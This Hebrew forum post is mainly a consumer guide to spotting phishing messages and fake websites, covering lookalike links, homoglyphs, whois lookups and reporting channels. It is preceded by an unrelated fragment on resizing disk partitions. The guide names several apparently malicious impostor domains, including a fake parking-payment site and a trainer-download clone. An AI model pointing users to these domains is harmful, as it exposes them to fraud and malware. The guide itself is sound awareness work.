יש לי תיקייה של "קונג פו פנדה כפות הגורל" ששוקלת 2.21 GB (לכל הסקרנים, אל דאגה זה בשביל הילדים שלי, לפעמים גם אני מציץ בהם, אחרי הכל לכולנו יש ילד קטן בפנים)
ובמקרה שלי יש אחסון של 30 GB אז אני מכווץ את האחסון ל - 25 GB כדי שיהיה לי מחיצה חדשה שיהיה אפשר להעביר אליה את החומר.
אחרי הכיווץ אנו מקליקים כמו בתמונות הבאות:
לפעמים מקבלים בסיום הפעולה הודעה כזאת:
לא צריך לחשוש, מדובר בשגיאה שאומרת שהכמות ג'יגה שבחרנו אינה חוקית, אבל בפועל תוכלו לראות שנוסף מחיצה חדשה עם מערכת קבצים FAT32.
כעת אנו נעתיק את כל החומר הקיים במחיצה הראשונה (NTFS) למחיצה השנייה (FAT32).
ואז נמחק את המחיצה של NTFS , ונרחיב את המחיצה של FAT32 לגודל המלא של האחסון.
שימו לב, לא תמיד אפשר להרחיב אמצעי אחסון ע"י הכלי של ווינדוס אלא ע"י ניהול דיסקים חיצוניים.
לאחרונה ראיתי הרבה תופעות של משתמשים שניזוקו מאתרים זדונים וכל מיני בעיות אבטחה.
חשבתי אולי לעשות מדריך שלי על זה יחד עם כמה מדריכים שיש ברשת כדי להסביר על התופעה הזאת ואיך אולי להימנע ממנה.
במחשבה שנייה אמרתי לעצמי אולי לא לטרוח ולעשות מדריך כזה כי אולי הדברים ברורים ולא צריכים להיכתב בשנית,
אבל נזכרתי בחידוש על פרשת שבוע שקראתי לא מזמן וזה שינה לי את החשיבה ולכן המדריך לפניכם.
היות וזה פורום טכנולוגי אכתוב את החידוש בספויילר
"ראה אנכי נותן לפניכם היום ברכה וקללה" (יא, כו) פתח הכתוב בלשון יחיד ראה, וסיים בלשון רבים לפניכם, מכאן ראיה
אומר הרה"ק ר' חיים מוורמייזא אחיו של המהר"ל מפראג זי"ע שאפילו יודע המוכיח כי מכל המקשיבים ללקחו יושפע רק אדם אחד ויחיד, אל ימנע דבריו מן הציבור. שכן מצינו למשה רבינו שדיבר בפני כל ישראל ואמר לפניכם בעוד שדבריו היו מכוונים אל היחיד ואמר לו 'ראה', כדי להציל נפש אחת מישראל.
להבדיל, אפילו אם הדברים שלי ימנעו מקרה אחד של אונאה הרי זה שכרי ולכן טרחתי לכתוב ולהעתיק את הדברים.
אחרי הרבה שנים של גלישה ברשת ואחרי המון ניסוי והטעיה יש לי את היכולת לאבחן במהירות רבה אם האתר או התוכנה מכילים תוכן מזיק או לא. אני אשדתל לשתף את כל הידע שלי שנאגר במשך כמה שנים טובות על כל מה שאני חושב על אבטחה כולל תמונות והסברים מדויקים לכל נושא.
כמובן שזה לא 100% כי אין אף פעם 100% אבל עדיין ישנם הרבה בדיקות שאולי יכולו לתת לכם אינדקיצה לפני מה אתם עומדים.
המדריך בנוי מכמה מדריכים שקיימים ברשת עם תוספות נכבדות שכתבתי בנוסף.
ראיתי בפורום כמה פעמים הפניה לאתרים זדונים שמכילים תוכנות זדוניות וכבר היה מקרה מצער לא מזמן על מישהו שקיבל וירוס כזה למחשב וממש חבל. זה גם מה שגרם לי לחשוב על מדריך ברור להקיף את מה שאפשר להקיף במסגרת האפשרית שאפשר לעשות באשכול אחד.
המדריך יהיה מחולק לכמה חלקים ונשתדל להרחיב בכל חלק וחלק ככל האפשר.
מתקפות פישינג גורמות ליותר ויותר אנשים להשאיר פרטים רגישים בידיהם של מתחזים.
באיזה טקטיקות נוקטים המתחזים – ואיך אפשר לזהות את המלכודות שהם מניחים?
מאז מגפת הקורונה, אנחנו עדים לגידול חד בתעבורת הרשת: בעקבות הסגרים והבידודים גם אנשים שעוד היססו, החלו לבצע יותר ויותר פעולות אונליין בלי לצאת מהבית. במקביל, ארגונים רבים האיצו את תהליכי הטרנספורמציה הדיגיטלית, ואפשרו ללקוחות לבצע מגוון הולך וגדל של פעולות בשירות עצמי. התאוצה הדיגיטלית שהחלה בתקופת הקורונה ממשיכה ויש לה יתרונות רבים, אך כל הטוב מגיע עם תופעת לוואי: צמיחת הפעילות בעולמות האונליין מלווה בגידול חד של תקיפות סייבר, שמסכנות את המידע ואת הכיס שלנו.
לשם המחשה חברת SlashNext דיווחה על גידול של 61% במתקפות הפישינג במחצית הראשונה של שנת 2022 ביחס לתקופה המקבילה אשתקד, במסגרת דוח שניתח מיליארדי קישורים, מיילים ואתרים.
אחת הסיבות לשגשוג מתקפות הסייבר בקנה מידה כה נרחב, היא חוסר מודעות: במקרים רבים, הודעות SMS, אתרים או מיילים תמימים למראה המתחזים לגופים מוכרים, מנסים "לדוג" מאיתנו מידע כמו פרטי חשבון הבנק או מספר כרטיס האשראי (מכאן גם שמן – מתקפות Phishing או "דיוג" בעברית). החדשות הטובות הן שאפשר לזהות ולמנוע אותן מראש, באמצעות הכרת הסממנים שלהן.
כך תזהו מתקפות פישינג ותימנעו ממלכודות באמצעות מספר סימני היכר בסיסיים של מתחזים בהודעות SMS, במיילים ובאתרים.
גם כאשר מדובר במסרונים, הודעות הפישינג הכי מסוכנות הן כאלה שמגיעות מגורמים המתחזים לחברות שאנחנו מכירים, כמו למשל הודעה מהדואר, מנטפליקס, מהבנק או מכל חברת מוכרת אחרת. ניסיונות הפישינג בהודעות סמס (Smishing) הופכים ליותר ויותר מתוחכמים, ולכן כדאי להיעזר בסימנים הבאים כדי לזהות אותם. איזה סימנים אמורים להדליק לכם נורה אדומה?
ניסוחים מוזרים
יש הודעות SMS שבהן הניסוחים מוזרים, כאילו לקחו משפטים מאנגלית ותרגמו אותם באמצעות Google translate. כך למשל המסרון בדוגמה מטה נפתח במילים "שלום אדוני", צורת התנסחות שלא מתאימה לפניות מנותני שירות בעברית.
בדיקת הקישור
בחלק מהמקרים ההודעה מנוסחת היטב, והיא אפילו נשמעת הגיונית: אם אנחנו מקבלים הודעה שהדואר מוכן לאיסוף (בזמן שאנחנו באמת מחכים לחבילה שהזמנו מעלי אקספרס), קל ליפול בפח. אחת הדרכים לזהות שמדובר בהודעת פישינג/ Smishing, היא בדיקת הקישור (בלי ללחוץ עליו): בדוגמה מטה אפשר לראות שהלינק במסרון ממש דומה לכתובת האמיתית של אתר דואר ישראל – https://israelpost.co.il/, עם הבדל אחד קטן-גדול: הקישור המתחזה מכיל מקף שמפריד בין המילה Israel למילה post
והמסקנה: לפני שמבצעים פעולה כלשהי, חשוב להשוות בין כתובת החברה שבשמה כביכול נשלח ה- SMS לבין הקישור שמופיע במסרון. הקישור שמכיל המסרון שונה? כנראה שיש לכם עסק עם מתחזה.
כשלים לוגיים
תמרור אזהרה נוסף לניסיון התחזות הוא שילוב משפטים שההקשר שלהם לא הגיוני. הנה דוגמה של ניסיון התחזות לחברת חשמל, במסגרתו השולח מבקש להסדיר את החוב באמצעות כניסה ללינק המצורף. כחלק מהניסיון לייצר תחושת דחיפות, התווסף המשפט הבא: "איחור בתשלום יגרור הוצאות נוספות כגון עלויות הפרדה ומשלוח". מכיוון שחברת חשמל עדיין לא גובה דמי משלוח עבור צריכת החשמל (בדגש על עדיין )... אפשר להניח שמדובר במתחזה. אגב, גם במקרה הזה אפשר לשים לב שהלינק מפנה לקישור זדוני ולא לקישור האמיתי של חברת חשמל: הכתובת האמיתית של אתר חברת החשמל היא www.iec.co.il.
יצירת תחושת דחיפות
ניסיון ההתחזות לחברת החשמל ממחיש טקטיקה נוספת של מתחזים, והיא יצירת תחושת דחיפות כמו למשל תשלום קנסות, או לחילופין משלוח שיוחזר לשולח אם לא נבצע תשלום תוך 72 שעות. מנסים להאיץ בכם לבצע פעולה בדחיפות? נורות האזהרה צריכות להידלק, ולגרום לכם להתייחס להודעה בשיא הזהירות.
הבטחה לפרס או זיכוי
אני זוכר בפעם הראשונה שקיבלתי הודעה מאיזה אתר מסויים שאומר לי שעליתי בהגרלה בגלל שאני הגולש המיליון מאוד התרגשתי, עד שהבנתי שהכל זה בלבולי שכל.
להודעות שמבטיחות פרס או תגמול כלשהו, צריך להתייחס בחשדנות. האם אתם מצפים לקבל סכום מסוים, כמו זיכוי, מחברה כלשהי? האם הקישור בהודעה מפנה לכתובת האמיתית של אתר החברה? האם אפשר להיכנס לאתר החברה באופן עצמאי, להתחבר לחשבונכם ולראות האם מחכה לכם הודעת זיכוי כלשהי? אם התשובה לאחת השאלות האלה היא "לא", רוב הסיכויים שרוצים לקחת מכם כסף, ולא להעניק לכם כסף.
איך מזהים מתקפת פישינג במייל?
ב
תמרורי האזהרה של הודעות ה- SMS חלים גם על מיילים, להם מתווספים תמרורי אזהרה ייעודיים:
הדומיין אינו מוכר
האם הדומיין (החלק שמגיע אחרי ה- @ בכתובת המייל – למשל gmail.com) אכן שייך לחברה שבשמה נשלח המייל? בדיוק כפי שבודקים את אמיתות הקישור, כך חשוב לבדוק מה הדומיין האמיתי של החברה שבשמה נשלח המייל, ולהשוות אותו לדומיין של הכתובת שממנה קיבלתם את המייל. בדוגמא מטה אפשר להבחין בקלות בכך שבקשת התשלום עם הכותרת Apple Inc, לא נשלחה מהדומיין apple.com של חברת אפל. ישנם מקרים שבהם הדומיין המתחזה יהיה כמעט זהה לדומיין האמיתי, ולכן חשוב להבחין בהבדלים (קטנים ככל שיהיו).
ואחרי שאמרנו את זה, האקרים יכולים לגרום לכתובת מייל להיראות לגיטימית. לכן, גם אם היא כביכול תקינה זה לא בהכרח מעיד על מהימנותו של המייל, וחשוב להמשיך לגלות ערנות.
למייל מצורף קובץ חשוד
חלק מניסיונות הפישינג כוללים קבצים המכילים תוכנה זדונית. כדי לגרום לכם להפעיל את התוכנה הזדונית, המייל ינסה לשכנע אתכם לפתוח את הקובץ. כך למשל בחלק מהודעות הפישינג נשלח קובץ המוצג כחשבונית. אחרי שתפתחו את הקובץ ותבינו שלא מדובר בחשבונית, זה כבר יהיה מאוחר מדי: הקובץ ישחרר תוכנה זדונית שתוכל לבצע מגוון פעולות עוינות במכשיר שלכם. כדי להימנע מתרחישי אימה מהסוג הזה מומלץ ככל האפשר להימנע מפתיחת קבצים הנשלחים במייל, אלא אם אתם יודעים בוודאות שמדובר בשולח לגיטימי. בכל מקרה אחר, מומלץ לנקוט בדרכים חלופיות, למשל להיכנס לאתר האמיתי של החברה שבשמה נשלח המייל, ולנסות דרכו להוריד את החשבונית או המסמך המדובר.
הקישור לא מוכר
המייל כולל קישור? אפשר לרחף עליו בלי ללחוץ כדי לראות מהי הכתובת שלו. לא מכירים את הקישור? הוא לא תואם לכתובת האתר האמיתית של נותן השירות? כנראה שמדובר במתחזה.
מתקפת פישינג, או בעברית דיוג, היא ניסיון לגניבת מידע ממשתמשים באמצעות התחזות תוך השפעה על המשתמש להכניס פרטים אישיים כגון סיסמה, תעודת זהות, מספר כרטיס אשראי, קוד וכו'. בתקופה האחרונה נסיונות אלו מתרבים ונעשים מתוחכמים יותר. בעוד חלק מהקישורים המופצים בדוא"ל או במסרון הם לגיטימיים, חשוב להיות מודעים לאפשרות שמדובר בניסיון דיוג. באמצעות עשרה סימנים פשוטים ניתן לזהות את רוב ניסיונות הדיוג ולהימנע מהכנסת הפרטים או מהקלקה על הקישור. זיכרו – אל תלחצו, שלא תילחצו.
כתובת השולח – ארגונים רשמיים שולחים הודעות מכתובות לגיטימיות של הארגון ולרוב לא מכתובת ג'ימייל למשל. כמו כן, צריכה להיות התאמה בין שם השולח לכתובת השולח.
יצירת לחץ ותחושת דחיפות – בקשה לביצוע פעולות מידיות מתוך "דחיפות", היא טכניקה נפוצה שנועדה לגרום לאנשים לפעול מלחץ ולהטעות אותם.
היעדר פניה אישית – לרוב, ארגונים רשמיים משתמשים בשם הפרטי של הלקוח ופונים אליו באופן אישי. פנייה כללית של "לקוח יקר", עשויה להוות סימן מחשיד.
נוסח חובבני – שגיאות כתיב וניסוח לקוי יכולים להעיד על התחזות. לרוב, ארגונים רשמיים לא שולחים הודעות עם שגיאות וטעויות.
הבטחות מוגזמות – הודעות המכילות הבטחות, הצעות לפרס או הצהרות בלתי סבירות הן בדרך כלל חשודות ומזויפות.
בקשה לפרטים אישיים – אלא אם נרשמת באופן יזום לאתר או ביצעת רכישה באינטרנט, אין סיבה שיבקשו ממך פרטים אישיים כגון סיסמאות, קוד ופרטי כרטיס אשראי.
שימוש בקישורים מקוצרים – בחלק מן המתקפות, נוטים להשתמש בקישורים מקוצרים כדי להסתיר את הכתובת האמתית של הקישור. ואולם, לא כל כתובת מקוצרת היא פישינג.
הפנייה לאתרים חיצוניים – אתרים מתחזים מנסים להטעות בעזרת כתובת הדומה לכתובת האתר האמיתי אך שונה בסדר האותיות או המילים ולפעמים כוללת טעויות איות קטנות. מומלץ לבחון היטב את הכתובת של האתר ולוודא שהגעת לאתר הנכון, במיוחד לפני מסירת פרטים.
כתובת שגויה – את אמינות כתובת האתר ניתן לוודא באמצעות אתרים ייעודים לכך או באמצעות הצגת הכתובת האמיתית של האתר על ידי מיקום העכבר על הקישור. בכל מקרה אם האתר מוכר, מומלץ לגשת אליו באופן יזום דרך הדפדפן ולא דרך קישור שהגיע בהודעה.
קבצים מצורפים – מומלץ לבחון את פתיחת הצרופה שהתקבלה בדוא"ל או את הקובץ שמבקשים בקישור או באפליקציה להוריד למכשירך. מומלץ לשים לב אם הבקשה מגיעה ממקור או מכתובת דואר אלקטרוני של שולח שציפיתם לו, אך לעיתים מה שצורף למייל עשוי להיות מזיק גם אם הגיע מדוא"ל של שולח מוכר. חשוב לשים לב אם מדובר בקובץ הרצה – קובץ שנותן פקודות למחשב בסיומת EXE. לעיתים קובץ הרצה מסתתר גם בקובץ שנראה לגיטימי.
זיהיתי את הסימנים, זה חשוד, איך מתמודדים?
אל תלחצו ואל תילחצו – ברוב המקרים של הודעות דיוג, אם לא הקלקת על הקישור או אם הקלקת ולא מילאת פרטים, אפשר להיות רגועים. במקום להקליק ישירות על הקישור, יש מה לעשות:
• בדיקה באתר הרשמי – במקום ללחוץ ישירות על הקישור שנשלח, כדאי לבדוק באתר הרשמי של הארגון או החברה באמצעות גלישה מהדפדפן או מחיפוש בגוגל. אם יש איזור אישי באותו אתר, אפשר לבדוק שם האם אכן יש בעיה או דרישה מסוימת כפי שאולי מנסים בהודעת הדיוג לטעון.
• חיפוש אזהרה להודעת הדיוג - באתר הרשמי של הארגון או ברשתות החברתיות הרשמיות שלו מופיעה לעיתים אזהרה מהודעת הדיוג המתחזה לארגון. כמו כן, ברשתות החברתיות שלנו לעיתים מופיעות אזהרות ממתקפות דיוג רחבות.
• בדיקה עם מערך הסייבר הלאומי – בחיוג ישיר 119 למרכז המבצעי של מערך הסייבר הלאומי, יכול כל אזרח וארגון לדווח, להתייעץ ולקבל סיוע ראשוני. זה חינם, זה פשוט וזה עובד 24/7.
• הצלבת מידע קצרה – אם למשל התקבלה הודעה על תשלום על חבילה שהוזמנה, מומלץ להצליב את מספר ההזמנה שמופיע בהודעה, עם אישור ההזמנה שהתקבל בעת הרכישה.
• מחיקת ההודעה – אם הסימנים נראים חשודים ובדיקה קצרה שלכם מעלה שמדובר בהודעה מתחזה, מומלץ לדווח עליה למערך הסייבר בחיוג 119 או בדוא"ל, למחוק אותה ולחסום את המספר או כתובת השולח.
איך מזהים מתקפת פישינג באתר?
ג
כדי לנסות להפיל אתכם בפח, דף באתר המתחזה ייראה לרוב דומה לדף באתר האמיתי. לשם כך נעשה שימוש בגרפיקה, תוכן ומבנה של הדף האמיתי. למרות הדמיון, הנה תמרורי האזהרה שיאפשרו לכם לזהות אתרים מתחזים.
ככל שאנחנו נעשים יותר ויותר תלויים באתרי אינטרנט או אפליקציות כדי לבצע פעולות שונות בחיי היום יום, כך גם הנוכלים וההאקרים נעשים יותר מתוחכמים. אחת השיטות לגרום לאנשים לספק פרטים רגישים כמו למשל פרטי אשראי או פרטים מזהים אחרים היא ליצור אתרי אינטרנט מזויפים שמתחזים לאתרים אמיתיים.
סביר להניח שאתם מבקרים בעשרות (אם לא מאות) אתרי אינטרנט שונים מדי יום. אתם קוראים מאמרים באתר הזה, ניגשים לערוצי המדיה החברתית מהאתר ההוא, צופים בתוכנית טלוויזיה באחד מאתרי הסטרימינג ולאחר מכן לוחצים על קישור שחבר שלח לכם.
אך האם אתם בטוחים שכל האתרים שאתם מבקרים בהם בטוחים ושאף אחד מהם אינו בעצם אתר של מלכודת פישינג?
שימו לב לנקודות הבאות:
אתר לא מאובטח
אתר מאובטח אמור להכיל את הסימנים הבאים: סימן המנעול וצירוף האותיות HTTPS. העדרו של אחר הסימנים עשוי להצביע על כך שנכנסתם לאתר עוין. יחד עם זאת, מכיוון שניסיונות ההתחזות הופכים ליותר ויותר מתוחכמים, גם הימצאות סימנים אלו לא בהכרח מעידה על היותו של האתר מהימן.
אחד מכללי האצבע העיקריים לבדיקת רמת אבטחתו של אתר מסוים היא בדיקה אם הוא משתמש בפרוטוקול HTTPS. למרות שהפרוטוקול נחשב בעבר לפתרון האולטימטיבי לכל בעיות האבטחה הנובעות מאתרי אינטרנט, במציאות הדבר מעט מסובכים יותר. כל מה שהפרוטוקול מבטיח הוא שהתקשורת בין שרת האינטרנט ובין הדפדפן של המשתמש מוצפנת בעוצמה חזקה. זה מגן מפני ציתותים, מה שהופך את הכניסה לאתר הבנק, למשל, לבטוחה יותר.
עם זאת, הפרוטוקול אינו יודע להגיד האם האתר שאיתו אתם מתקשרים באופן בטוח הוא אכן האתר של הבנק שלכם, או העתק מדויק שלו שמנסה לגנוב את פרטי הגישה שלכם.
כיום, פושעי סייבר יכולים להשיג תעודת SSL/TLS תקינה לחלוטין בקלות רבה עבור האתרים הזדוניים שלהם, ממש כפי שעסק לגיטימי יכול להשיג תעודה זו. מכיוון שהאפשרות להשגת תעודה כזו הפכה לזולה מאוד (ואף חינמית) וקלה יותר להטמעה, אנחנו נמשיך לראות יותר ויותר מקרים בהם פושעי סייבר משתמשים בהן כדי לגרום למשתמשים תמימים לחשוב שהאתר "בטוח".
השורה התחתונה היא שכיום מרבית האתרים משתמשים ב-SSL/TLS ולכן זה לא יכול להצביע על מידת הבטיחות של אתר מסוים. זהו רק חלק אחד מפאזל גדול, ועליכם לבחון סימנים מחשידים נוספים בנוסף אליו. עליכם להסתכל על האתר כמכלול ולראות אם יש יותר מסימן חשוד אחד.
בכל הנוגע לתעודות, כדאי לבדוק מה השירותים שהאתר מציע ומי הארגון שהנפיק את האישור. אם האתר עוסק בנתונים בעלי רגישות גבוהה אך ספק התעודה הוא זול או חינמי, כדאי להתחיל לחשוד ולחקור את האתר באופן מעמיק יותר. כדי לבדוק את תקפות התעודה ואת זהות מנפיק התעודה, ניתן ללחוץ על סמל המנעול שנמצא בשורת הכתובת בדפדפן שלכם.
קישור חשוד
דומה לתמרור האזהרה במיילים ובמסרונים. חשוב כאמור לגלות ערנות, שכן המתחזים ינסו להערים עליכם עם שינויים קטנים ביחס לדומיין האמיתי, כמו הוספה או החסרת אותיות ותווים (זוכרים את המקף הערמומי בניסיון ההתחזות לדואר ישראל?).
בקשת פרטים אישיים
מבקשים שתזינו סיסמא, תעודת זהות, אמצעי תשלום או כל פרט אישי אחר? כדאי ככל האפשר להימנע מכך, ובמידת הצורך להיכנס באופן יזום לאתר של נותן השירות האמיתי, להזדהות ולבצע בבטחה את הפעולה הרצויה.
רוצים לבדוק שמדובר באתר מתחזה? אם הוא מבקש מכם סיסמא, אפשר להזין באופן מכוון סיסמא מזויפת. קיבלתם אינדיקציה שההתחברות הצליחה? כנראה שמדובר באתר מתחזה.
בקשת תשלום חשודה
ברוב האתרים הלגיטימיים, התשלום יתבצע באמצעות כרטיס אשראי או ארנק דיגיטלי דוגמת פייפאל. לעומת זאת, אתרים מתחזים רבים קוראים לביצוע התשלום באמצעות העברה בנקאית. זאת מתוך ידיעה שהסיכוי לקבל החזר עבור העברה בנקאית שביצעתם באתר מתחזה, נמוך בהרבה מהסיכוי לקבל החזר במקרה של חיוב כרטיס האשראי.
כמובן שלתמרורי האזהרה הייעודיים של אתרים מתחזים, מתווספים הסימנים החלים גם על מסרונים ומיילים, כמו ניסוחים תלושים, כשלים לוגיים ויצירת תחושת דחיפות.
מתקפות פישינג יכולות לגרום נזקים גדולים, לפרטיות ולכיס. שמירה על ערנות וזיהוי סימנים מחשידים, יאפשרו לכם להישמר ממלכודות בהן יותר ויותר אנשים נופלים.
כתיב חסר
היזהרו מכתובות URL שאינן מאויתות באופן נכון ומתווים דומים
חלק מהטקטיקות הנפוצות ביותר בהן משתמשים פושעי סייבר כדי לגרום לאנשים להיכנס לאתר הזדוני שלהם הן מתקפות הומוגליף (הידועות גם בשם הומוגרף) וכתובות URL בעלות שגיאות איות מכוונות והטעיות אחרות.
זה עלול להישמע מסובך אבל בסה"כ מדובר במתקפה בה פושע הסייבר רושם כתובת רשת (domain) שהשם שלה דומה מאוד לשם של חברה אחרת אך נכתב באופן שונה, או באמצעות אותיות שונות שנראות דומות למקוריות.
לשם ההדגמה, דמיינו שהשם Microsoft מאוית כ - rnicrosoft.com, כך שהאות n נמצאת לאחר האות r והשתיים יחד נראות כמו האות m (כשזה תלוי בסוג הפונט, הגודל שלו והמיומנות של הקורא). במקרה אחר, ניתן להחליף את אחד מתווי ה-o בשם Facebook באות היוונית אומיקרון (ο) וליצור כתובת כמו facebook.com., אם לא הבחנתם, ה-o השנייה הוחלפה באות אומיקרון.
תכסיס דומה נקרא (typosquatting) ובו התוקף רושם כתובות אינטרנט הדומות לאלו של אתרי רשת פופולריים אך מוסיף להם שגיאות כתיב נפוצות, כמו gogle.com או gooogle.com. שתי הכתובות האלה נמצאות היום בידי גוגל ומפנות לאתר המקורי, אך ישנן עוד אפשרויות רבות נוספות.
כמובן, האתר המזויף יעוצב כך שלא יהיה ניתן להבדיל בינו ובין האתר המקורי, כך שתבטחו בו אפילו יותר. לכן אנו ממליצים לנקוט בזהירות יתרה כשאתם מעתיקים כתובת רשת או לוחצים על קישור לכתובת רשת, וכן לבדוק תמיד שאתם נמצאים באתר הנכון. לחלק ממוצרי האבטחה יש רכיב לזיהוי מתקפות הומוגליף, והם אמורים להתריע בפניכם כשאתם מנסים לגשת לדף רשת חשוד.
בדקו האם האתר הוא אתר זדוני
אם אתם חוששים שיש משהו חשוד באתר שאתם מבקרים בו (או מתכננים לבקר בו), ישנם מספר כלים מקוונים בהם תוכלו להשתמש כדי לבדוק אם האתר הוא זדוני.
גוגל, למשל, מציעה כלי לזיהוי סטטוס ה- Safe Browsing של אתר מסוים, אליו ניתן להעתיק את הכתובת של אתר מסוים כך שהכלי יגיד לכם אם הוא בטוח או לא. תוכלו להשתמש גם בבודק כתובות הרשת של VirusTotal שמנתח את כתובת הרשת של אתר מסוים, בודק אותו מול כמה מנועי אנטיוירוס וסריקת אתרים מהשורה הראשונה ומראה האם הוא זדוני.
תוכלו גם להגיש שאילתת whois כדי לברר מי הבעלים של שם המתחם (domain) בו אתם מבקרים. whois הוא רשימה הכוללת מידע על שמות מתחם, כמו בעלי שם המתחם, מתי הוא נרשם ודרכי התקשרות עם הבעלים. כדי להגיש שאילתה כזו, כל שעליכם לעשות הוא לגשת לאתר אינטרנט ייעודי העוסק בזה ולהזין את כתובת האתר בו אתם רוצים לבקר.
בין היתר, אתם תרצו לדעת האם שם המתחם הוא כזה שנרשם רק בזמן האחרון, מה שעשוי להצביע על כך שהוא זדוני. אם אתם לוחצים על לחצן "הצג מידע נוסף" ורואים נתונים חלקיים או בעלי שגיאות כתיב, כדאי להעלות את רמת החשדנות; עם זאת, ישנם מקרים בהם מצב כזה נובע מכך שאנשים לא הקדישו תשומת לב רבה לדברים האלה בעת רישום שם המתחם.
חפשו את מדיניות הפרטיות
אם אתם נמצאים באתר אינטרנט ואינכם בטוחים אם הוא לגיטימי או לא, כדאי לבדוק האם יש לו מדיניות פרטיות. לכל אתר לגיטימי צריכה להיות אחת כזאת, מכיוון שהן אחת מהדרישות לעמידה בתקנות הגנת המידע השונות – ועליה להסביר כיצד האתר משתמש בנתוני המשתמשים ומגן עליהם.
עסקים שאינם פועלים בהתאם לתקנות הגנת המידע, ובעיקר בהתאם לתקנות הגנת המידע הכלליות של האיחוד האירופי (GDPR), עשויים לעמוד בסנקציות חמורות כתוצאה מפערי הפרטיות והאבטחה שנובעים מאי-עמידה בתקנות האלה. אם לאתר מסוים אין מדיניות פרטיות, או שיש לו מדיניות כזאת אך היא מעורפלת, זה מראה שלמפעילי האתר לא אכפת מחוקי הגנת המידע הנוקשים שנאכפים ברחבי העולם ושמשהו אינו תקין.
פרטי יצירת קשר
כל חברה לגיטימית מעוניינת ביצירת מערכת יחסים ארוכת-טווח עם לקוחותיה, ותציג פרטים ליצירת קשר באתר האינטרנט למקרה שמשהו אינו כשורה. לרוב מדובר בטופס יצירת קשר, כתובת דוא"ל, כתובת דואר פיזית או מספר טלפון. ישנם מספר סימני אזהרה שכדאי לחפש כשאינכם בטוחים אם האתר אכן מייצג עסק לגיטימי.
לדוגמה, אם אתם מנסים להתקשר למספר הטלפון והוא אינו זמין, או שנשמע כאילו האדם שעונה לטלפון אינו מקצועי, סביר להניח שאתם נמצאים באתר המשמש תשתית לתרמית. אם המבחן הזה עובר בהצלחה, בצעו בדיקה נוספת – חפשו את פרטי הקשר הרשמיים של החברה בגוגל והתקשרו למספר המופיע שם ליתר ביטחון.
השתמשו בפתרון אבטחה אמין (כמו תוכנות אנטי וירוס של רשת)
שימוש בפתרון אבטחה מקיף ומהימן יכול לעזור במידה רבה בהתגוננות מפני איומי רשת, לרבות אתרים זדוניים. מרבית תוכנות האבטחה יסרקו את הדף באמצעות מנגנוני סריקה מובנים שמחפשים תוכן זדוני, ויחסמו את הגישה לאתר אם יזהו דבר מה שעלול להוות איום. זה מונע הורדה של תוכן זדוני, מכל מקור שהוא.
תוכנת ההגנה גם תשווה בין האתר ובין רשימה שחורה של אתרים הידועים כזדוניים, ותחסום את הגישה אם תמצא התאמה. פתרונות אבטחה מהימנים ישתמשו גם בטכנולוגיה להגנה מפני מתקפות פישינג, כך שתהיו מוגנים מפני מניסיונות לגניבת סיסמאות, נתוני בנקאות ומידע רגיש אחר באמצעות אתרים זדוניים המתחזים לאתרים לגיטימיים. אם תנסו לגשת לכתובת אינטרנט מסוימת, פתרון האבטחה ישווה בינה ובין בסיס נתונים של אתרי פישינג, ובמידה ותימצא התאמה הוא יחסום את הגישה ויציג התראה המזהירה מפני הסכנה.
אינו דומה תא חזי לתא שמע ולכן חשבתי להראות לכם כמה דוגמאות של אתרים זדונים כדי להבין ולראות במוחש את כל מה שעסקנו עד כה.
נביא רשימה של כמה אתרים ששמרתי בשביל המדריך:
איזה אתר בעולם בדף הבית אתה מופנה למלא טופס של כרטיס אשראי??
נסו גם באתר הזה למלא איזה סתם פרטים ותראו שיהיה כתוב "התשלום בבדיקה" וזה אכן גניבה ופישינג.
לפני איזה חודש היה אתר ברשת בשם https://www.pangoparking.net/
מי שמבין אנגלית בטח יודע שזה אתר שיכול להיות קשור לחניה פנגו והוא מבקש ממך לשלם את דמי החניה
בדיקה קצרה בגוגל תביא לי את האתר של פנגו האמיתי - https://www.pango.co.il/
עכשיו האתר הושעה בגלל שבעל הדומיין לא עשה אימות לפרטים שהוא ציין בהרשמה
תרגום למי שרוצה:
נדרש אימות דומיין
דומיין זה מושעה כעת.
מדוע דומיין זה מושעה?
ICANN, הארגון שמסדיר רישום דומיינים, דורש מהבעלים של דומיין לאמת את פרטי הקשר שלו בתוך 15 יום מרגע רישום חדש או שינוי איש הקשר. לאחר פרק זמן זה, הדומיין מושעה עד שהמידע אומת.
כיצד אוכל להפעיל מחדש את הדומיין שלי?
אם אתה הבעלים של דומיין זה, אנא אמת את המידע שלך על ידי לחיצה על הקישור בדוא"ל שנשלח לכתובת הדוא"ל של הרושם המשויכת לדומיין. אם אין לך את האימייל, תוכל להיכנס לחשבונך כדי לשלוח אותו מחדש.
אפשר להיכנס לדף ולראות את כל הקישורים ואת צורת הדף שזה פייק אחד גדול.
אתרי תוכנות זדונים שורצים בכל מקום, מספיק לכתוב את המילה בחיפוש גוגל Crack או Trainer וכדומה ותגלה עולם שלם של תוכן זדוני.
באתרים האלה רובם זה כמה רמות מעל ושם נמצאים רוב הוירוסים של כופר כפי שהארכתי כאן: https://mitmachim.top/post/653970
אני אתן רק דוגמא אחת לזה ושימו לב לצורה המקצועית של האתר הפייק.
יש אתר של קודים למשחקי מחשב בשם: https://flingtrainer.com/
זה אתר שרוב העולם נכנס אליו לפחות פעמיים ביום לבדוק אם יש עדכון חדש על עבודה שעושה בעל האתר.
לפני כמה חודשים הגעתי לאתר הבא וכמעט שהורדתי את התוכן שלו https://www.fling-trainer.com/
שימו לב להשקעה של האתר הזדוני עם אותם צבעים בדיוק ואותו עיצוב ורק חדי העין יכולים להבחין בהבדל, אפילו הדומיין שלו מבלבל מאוד. אני מאמין שכל יום יש עשרות קורבנות באתר הזה.
בטח תשאלו איך זה שלא נפלתי? הסיבה בגלל שחיפשתי קודים לאיזה משחק שלא מצאתי בכל הרשת, ואז שהגעתי לאתר הזה ראיתי שהוא קיים, זה כבר החשיד אותי כי לפעמים יש מציאות שאנחנו רואים משהו אבל קשה לנו לעכל אותה ולכן אנחנו מחפשים בכל הרשת כדי לבדוק אם אכן זה קיים בגלל שאנחנו בטוחים שזה קיים וזה באמת לא, כאן בנקודה הזאת תופס אותך אתר או תוכנה זדונית כדי לגרום לך להאמין שזה אכן קיים ורק תוריד את התוכנה.
שימו לב שבמצבים כאלה שאתה מחפש משהו שעות ולא מוצא ואז רואה את זה באיזה אתר נידח ברשת אתה כאילו אוטומטי מוריד את התוכן באתר ולא משנה כל כך כל הנקודות שמתריעות אותך שזה אתר זדוני.
קישורים מקוצרים הפכו נפוצים לשימוש, אך לעיתים קישור מקוצר עלול להיות זדוני ולכן תמיד כדאי לבדוק מה מסתתר.
